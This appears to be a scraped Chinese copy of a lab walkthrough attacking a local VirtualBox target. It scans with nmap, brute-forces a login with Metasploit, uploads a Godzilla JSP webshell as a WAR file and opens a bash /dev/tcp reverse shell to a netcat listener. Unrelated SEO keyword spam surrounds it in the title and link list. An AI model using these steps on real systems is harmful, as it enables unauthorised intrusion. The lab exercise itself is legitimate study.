当前位置: 首页 > wzjs >正文

临沂医院网站建设长春网站建设公司

临沂医院网站建设,长春网站建设公司,杭州高端设计网站建设,wordpress可以做门户网站1.我们将靶机导入virtualbox,将连接方式切换为仅主机(host-only) 2.在kali虚拟机中将网卡设置为桥接模式,桥接至我们的virtualbox 3.开启靶机 4.在kali中扫描端口 arp-scan -l 扫描端口 nmap -o 192.168.56.101 发现开启了22和…

1.我们将靶机导入virtualbox,将连接方式切换为仅主机(host-only)

2.在kali虚拟机中将网卡设置为桥接模式,桥接至我们的virtualbox

3.开启靶机

4.在kali中扫描端口

arp-scan -l

扫描端口

nmap -o 192.168.56.101

发现开启了22和8080端口

5.我们访问网站的8080端口

6.发现有一个登录框

7.使用msf爆破一下

msfconsole

use 0

show options

set RHOSTS 192.168.56.101

run

这里我们扫描到了登录信息,并进行登录

8.登录后我们发现有一个上传war包的位置

9.首先我们使用哥斯拉生成一个jsp木马并保存到1.jsp,然后将1.jsp文件压缩为123.zip,修改后缀为war文件,上传

10.我们可以看到war包上传成功

11.我们访问一下生成的1.jsp文件

12.复制文件绝对路径,到哥斯拉中去连接

连接成功!

13.在kali中开启监听  nc -lvvp 8888

哥斯拉中执行反弹shell代码   /bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/8888 0>&1'

14.在kali中成功监听!!

http://www.dtcms.com/wzjs/443667.html

相关文章:

  • 网站开发仓库管理系统需求分析宁波seo教程推广平台
  • 网页搜索代码seo是什么化学名称
  • 舟山网站设计公司一键建站
  • 记事本做网站背景广州seo关键词
  • 东莞网站优化方案优化大师的优化项目有哪7个
  • 海南seo网站排名优化快速
  • b2b网站推广网店运营在哪里学比较好些
  • 找网上公司做网站知名做网站的公司
  • 自己怎么来建设网站网站免费搭建
  • app定制软件开发安卓优化大师2023
  • 外贸网站建设大概多少钱网络推广公司怎么找客户
  • 网站用什么东西做西安seo网站建设
  • 简单网站开发实例汇总百度搜索引擎优化相关性评价
  • python不用框架做动态网站百度网址安全检测
  • 模板展示网站源码网络营销中的四种方法
  • 网页布局照着别的网站做会侵权吗seo怎么优化步骤
  • 做网站赚钱的QQ群太原竞价托管公司推荐
  • 铜陵app网站做招聘陕西企业网站建设
  • 美国买虚拟空间送域名的网站国内seo公司排名
  • 扬州做网站的价格品牌推广包括哪些内容
  • 注册城乡规划师准考证打印时间seo推广网址
  • 网站建设接外包流程图seo视频教程
  • 为什么python不适合开发网站做一个网站
  • 日照公司做网站seo顾问多少钱
  • 域名备案成功怎么做网站广州最新疫情通报
  • 如何做音乐分享类网站seo优化公司哪家好
  • 黄金网站大全免费2023长沙seo优化价格
  • 网站建设制度制定建设网站
  • 哪种企业适合做网站怎么建立企业网站免费的
  • 郑州网站制作网页国内建站平台